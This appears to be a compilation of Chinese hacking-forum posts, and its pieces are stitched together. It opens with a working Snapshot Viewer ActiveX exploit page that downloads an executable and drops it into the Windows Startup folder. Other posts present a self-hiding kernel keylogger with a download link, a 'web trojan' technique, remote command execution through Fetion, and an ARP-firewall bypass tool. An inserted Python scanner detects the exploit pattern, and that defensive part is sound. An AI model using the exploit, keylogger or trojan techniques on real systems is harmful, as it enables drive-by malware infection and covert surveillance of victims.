->
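Someone published an advisory for Snapshot Viewer today; combining it with CERT's dranzer.pdf paper, I reproduced the vulnerability.
EXP:
<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
// SnapshotPath: the control issues an HTTP GET for this URL
var buf1 = 'http://127.0.0.1/a.exe';
// CompressedPath: local path the fetched file is saved to
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>
When fuzzing, you normally fuzz a single Property or a single Method() at a time; doing so reveals an HTTP GET triggered by SnapshotPath. Then consider that it always needs to save the file locally, and test the other properties. Because this ActiveX control has very few properties and methods, the fuzzing finishes quickly.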
->
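Author: WZT
Source: WZT的自由世界
This program is derived from THC's vlogger; I ported it to 2.6.9. Anyone who needs it is welcome to play with it.
Run make; make install to install it. The module hides itself automatically, and the generated log files are under /tmp/kloger, which is also hidden.
Stability needs further testing; this program is for study and exchange only.

Download: http://blogimg.chinaunix.net/blog/upfile2/080708211858.gz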
->
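Author: lcx
Source: vbs小铺
To test this web trojan you do not need to install Access; installing SNAPVIEW.EXE on its own is enough (it can be downloaded from Microsoft). However, I did not find a method in this control that can execute anything, so the web trojan's exe can only be placed in the startup folder after JS has determined the system's language setting. Users who have Access installed should be careful. Below are the properties and methods of this ActiveX control that I found with eXeScope.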
SnapshotViewerControl; // Snapshot Viewer Control

Enum SnapZoom;
  snapZoomToFit = 0;
  snapZoomToFill = 1;
  snapZoom200Percent = 2;
  snapZoom150Percent = 3;
  snapZoom100Percent = 4;
  snapZoom75Percent = 5;
  snapZoom50Percent = 6;
  snapZoom25Percent = 7;
  snapZoom10Percent = 8;

Dispatch ISnapshotViewer; // Snapshot Viewer Control
GUID={EE7C5CD0-368C-11D0-AD81-00A0C90DC8D9};
  function QueryInterface(riid:^GUID; out ppvObj:^^void);
  function AddRef: UI4;
  function Release: UI4;
  function GetTypeInfoCount(out pctinfo:^UINT);
  function GetTypeInfo(itinfo:UINT; lcid:UI4; out pptinfo:^^void);
  function GetIDsOfNames(riid:^GUID; rgszNames:^^I1; cNames:UINT; lcid:UI4; out rgdispid:^I4);
  function Invoke(dispidMember:I4; riid:^GUID; lcid:UI4; wFlags:UI2; pdispparams:^DISPPARAMS; out pvarResult:^variant; out pexcepinfo:^EXCEPINFO; out puArgErr:^UINT);
  property-get SnapshotPath: BSTR;
  property-put SnapshotPath(BSTR);
  property-get CompressedPath: BSTR;
  property-put CompressedPath(BSTR);
  property-get Zoom: SnapZoom;
  property-put Zoom(SnapZoom);
  property-get AllowContextMenu: bool;
  property-put AllowContextMenu(bool);
  property-get ShowNavigationButtons: bool;
  property-put ShowNavigationButtons(bool);
  property-get PageCount: I4;
  property-put PageCount(I4);
  property-get CurrentPage: I4;
  property-put CurrentPage(I4);
  property-get ReadyState: I4;
  property-put ReadyState(I4);
  property-get Error: I4;
  property-put Error(I4);
  function AboutBox;
  function PrintSnapshot(fShowDialog:bool);
  function FirstPage;
  function PreviousPage;
  function NextPage;
  function LastPage;
  function GetDesiredExtents(out pdxDesired:^I4; out pdyDesired:^I4);
  function NotifyDataChanged;
  function PrintSnapshotDirect(bstrDriverName:BSTR; bstrPrinterName:BSTR; bstrPortName:BSTR);

Dispatch DSnapshotViewerEvents; // Event interface for the Snapshot Viewer Control
GUID={EFAF8180-368C-11D0-AD81-00A0C90DC8D9};
  function FirstPage;
  function PrevPage;
  function NextPage;
  function LastPage;
  function Progress(Amount:I4);
  function ReadyStateChange(ReadyState:I4);

Class SnapshotViewer; // Snapshot Viewer Control
GUID={F0E42D50-368C-11D0-AD81-00A0C90DC8D9};
  function QueryInterface(riid:^GUID; out ppvObj:^^void);
  function AddRef: UI4;
  function Release: UI4;
  function GetTypeInfoCount(out pctinfo:^UINT);
  function GetTypeInfo(itinfo:UINT; lcid:UI4; out pptinfo:^^void);
  function GetIDsOfNames(riid:^GUID; rgszNames:^^I1; cNames:UINT; lcid:UI4; out rgdispid:^I4);
  function Invoke(dispidMember:I4; riid:^GUID; lcid:UI4; wFlags:UI2; pdispparams:^DISPPARAMS; out pvarResult:^variant; out pexcepinfo:^EXCEPINFO; out puArgErr:^UINT);
  property-get SnapshotPath: BSTR;
  property-put SnapshotPath(BSTR);
  property-get CompressedPath: BSTR;
  property-put CompressedPath(BSTR);
  property-get Zoom: SnapZoom;
  property-put Zoom(SnapZoom);
  property-get AllowContextMenu: bool;
  property-put AllowContextMenu(bool);
  property-get ShowNavigationButtons: bool;
  property-put ShowNavigationButtons(bool);
  property-get PageCount: I4;
  property-put PageCount(I4);
  property-get CurrentPage: I4;
  property-put CurrentPage(I4);
  property-get ReadyState: I4;
  property-put ReadyState(I4);
  property-get Error: I4;
  property-put Error(I4);
  function AboutBox;
  function PrintSnapshot(fShowDialog:bool);
  function FirstPage;
  function PreviousPage;
  function NextPage;
  function LastPage;
  function GetDesiredExtents(out pdxDesired:^I4; out pdyDesired:^I4);
  function NotifyDataChanged;
  function PrintSnapshotDirect(bstrDriverName:BSTR; bstrPrinterName:BSTR; bstrPortName:BSTR);
  function FirstPage;
  function PrevPage;
  function NextPage;
  function LastPage;
  function Progress(Amount:I4);
  function ReadyStateChange(ReadyState:I4);

Class SnapshotViewerDeprecated; // Snapshot Viewer Control
GUID={F0E42D60-368C-11D0-AD81-00A0C90DC8D9};
  function QueryInterface(riid:^GUID; out ppvObj:^^void);
  function AddRef: UI4;
  function Release: UI4;
  function GetTypeInfoCount(out pctinfo:^UINT);
  function GetTypeInfo(itinfo:UINT; lcid:UI4; out pptinfo:^^void);
  function GetIDsOfNames(riid:^GUID; rgszNames:^^I1; cNames:UINT; lcid:UI4; out rgdispid:^I4);
  function Invoke(dispidMember:I4; riid:^GUID; lcid:UI4; wFlags:UI2; pdispparams:^DISPPARAMS; out pvarResult:^variant; out pexcepinfo:^EXCEPINFO; out puArgErr:^UINT);
  property-get SnapshotPath: BSTR;
  property-put SnapshotPath(BSTR);
  property-get CompressedPath: BSTR;
  property-put CompressedPath(BSTR);
  property-get Zoom: SnapZoom;
  property-put Zoom(SnapZoom);
  property-get AllowContextMenu: bool;
  property-put AllowContextMenu(bool);
  property-get ShowNavigationButtons: bool;
  property-put ShowNavigationButtons(bool);
  property-get PageCount: I4;
  property-put PageCount(I4);
  property-get CurrentPage: I4;
  property-put CurrentPage(I4);
  property-get ReadyState: I4;
  property-put ReadyState(I4);
  property-get Error: I4;
  property-put Error(I4);
  function AboutBox;
  function PrintSnapshot(fShowDialog:bool);
  function FirstPage;
  function PreviousPage;
  function NextPage;
  function LastPage;
  function GetDesiredExtents(out pdxDesired:^I4; out pdyDesired:^I4);
  function NotifyDataChanged;
  function PrintSnapshotDirect(bstrDriverName:BSTR; bstrPrinterName:BSTR; bstrPortName:BSTR);
  function FirstPage;
  function PrevPage;
  function NextPage;
  function LastPage;
  function Progress(Amount:I4);
  function ReadyStateChange(ReadyState:I4);
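
A defender-side check for the pattern described in the two Snapshot Viewer posts above (the EXP and the property listing), added here as an example and not part of either original post: it flags pages that load the control by the two class CLSIDs in the listing and set a remote SnapshotPath together with a CompressedPath. The function names, the "high"/"review" labels and the sample pages are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser

# CLSIDs of the SnapshotViewer and SnapshotViewerDeprecated classes in the listing above.
SNAPVIEW_CLSIDS = {"F0E42D50-368C-11D0-AD81-00A0C90DC8D9",
                   "F0E42D60-368C-11D0-AD81-00A0C90DC8D9"}
REMOTE = re.compile(r"(?i)^(?:https?|ftp)://|^\\\\")  # URL or UNC source

class ObjectCollector(HTMLParser):
    """Collect the ids of <object> tags that load the Snapshot Viewer control."""
    def __init__(self):
        super().__init__()
        self.ids = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "object":
            clsid = (attrs.get("classid") or "").upper().replace("CLSID:", "").strip("{} ")
            if clsid in SNAPVIEW_CLSIDS:
                self.ids.append(attrs.get("id") or "")

def scan(html):
    """Return one finding per Snapshot Viewer <object>; 'high' means a remote
    SnapshotPath is combined with a page-chosen CompressedPath."""
    collector = ObjectCollector()
    collector.feed(html)
    # Resolve simple string variables such as: var buf1 = '...';
    strings = dict(re.findall(r"""\b(\w+)\s*=\s*['"]([^'"]*)['"]""", html))
    findings = []
    for oid in collector.ids:
        props = {}
        if oid:
            pat = r"\b%s\.(SnapshotPath|CompressedPath)\s*=\s*([^;\n]+)" % re.escape(oid)
            for name, rhs in re.findall(pat, html):
                rhs = rhs.strip()
                props[name] = strings.get(rhs, rhs.strip("'\""))
        src, dst = props.get("SnapshotPath", ""), props.get("CompressedPath", "")
        level = "high" if REMOTE.search(src) and dst else "review"
        findings.append({"id": oid, "level": level, "source": src, "dest": dst})
    return findings

# Constructed sample pages (placeholder host and paths, not taken from any real site).
SUSPICIOUS = """<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='o'></object>
<script>var a = 'http://files.example/report.bin'; var b = 'C:/temp/out.bin';
o.SnapshotPath = a; o.CompressedPath = b; o.PrintSnapshot();</script>"""
VIEW_ONLY = """<object classid="CLSID:F0E42D60-368C-11D0-AD81-00A0C90DC8D9" id="v"></object>
<script>v.SnapshotPath = "reports/q2.snp";</script>"""
```

Any page that instantiates the control is reported at least as "review", since scripts that build the property values dynamically are not resolved by this static check.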
->
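Source: Solo's Tech Space
Last time I decompiled FetionFx.exe with Reflector, and then, with nothing better to do, wrote the little thing below. To be clear, this thing has no intention of infringing on anything. Copying other people's code is also one of my great strengths, so if you find lines in the code that look very familiar, SORRY, I copied them for fun, please don't mind, and of course you are welcome to copy mine too (it is a kind of recognition for me). This thing is only for learning and practicing coding, has no practical use in terms of functionality, and bears no legal responsibility. It is for my own amusement only. I call it FXRobot.
FXRobot features:
Send a message from Fetion or a mobile client to make the PC client execute commands supported by the plugins you have added; the commands in the plugins can also be run on a schedule. This gives remote and scheduled execution of programs on the PC. If you click to turn the robot off, it is just an ordinary Fetion.
Commands that can currently be executed:
1. Command lines of the Start -> Run kind, such as "[cmd]ipconfig, [cmd]shutdown -s".
2. English-Chinese translation, such as "[fy]test, [fy]测试".
3. Running multiple Fetion instances on one machine is supported.
First, a few screenshots:
Figure 1: an "FXRobot管理" (FXRobot Management) entry has been forcibly added to the menu

Figure 2: the interface
Figure 3: you can add the users allowed to run the robot program; only the selected users will execute the commands in those plugins.
Other screenshots are in the album:
http://www.cnblogs.com/solo/gallery/143922.html

Finally, the most important part.
Trial:
Download: fxrobot_compile_dll.rar
1. Back up FetionFx.exe under X:\Program Files\China Mobile\Fetion.
Copy the files from fxrobot_compile_dll.rar into it. Done.
FXRobot source code: fxrobot_source_code.rar
Unsolved problem, please help:
http://space.cnblogs.com/question/1831/
Reference articles:
上午的绝缘杯:
Controlling a computer through free mobile SMS: an introduction to "执行者"
坚守理想:
[Repost] SQLite FAQ
元宝家园:
Code debugging techniques summarized from decompiling Fetion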
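Source: gxgl.com
Note: databases from older versions need to be upgraded; put update.exe in the same directory and run it to upgrade. What should go in the Shell remarks field? => ASP script, ADO database: Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=pass | other information; => PHP script, MySQL database: localhost | root | pass | other information; INFOMIX and ORACLE databases:...

Author: cnqing
Source: cncert.net
Software description: a simple network management program aimed at limiting traffic, able to get past any ARP firewall. Usage: 1. Select the working network adapter in the parameter settings; 2. Check whether the gateway information and the local machine information are correct; if not, enter them manually, no need to save; 3. Click traffic detection, add manually, or scan automatically to fill the target list; 4. Set a proxy, preferably not...

Source: 邪恶八进制信息安全团队 (www.eviloctal.com)
Author: fhod
I'm posting this because, after reading asm's "[Original] New-concept mail-receiving program: the drop box will never get hacked" http://forum.eviloctal.com/thread-32151-1-1.html, members PMed me again.. plus it has been a long time.. it is nothing secret any more.. it is probably all over the net.. so I thought about releasing it.. consider it...

Author: vbs_zone
Source: vbs空间
Copy the myipneighbors query results, save them, then drag the file onto this script to tidy them up. Because myipneighbors has a CAPTCHA and my ability is limited, I could not get past it.. so this will have to do for now. When you run into a virtual machine, you can still save some effort.
On Error Resume Next
Set Arg=Wscript.Arguments
If Arg.count=0 then Wscript.quit
'code by Net...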










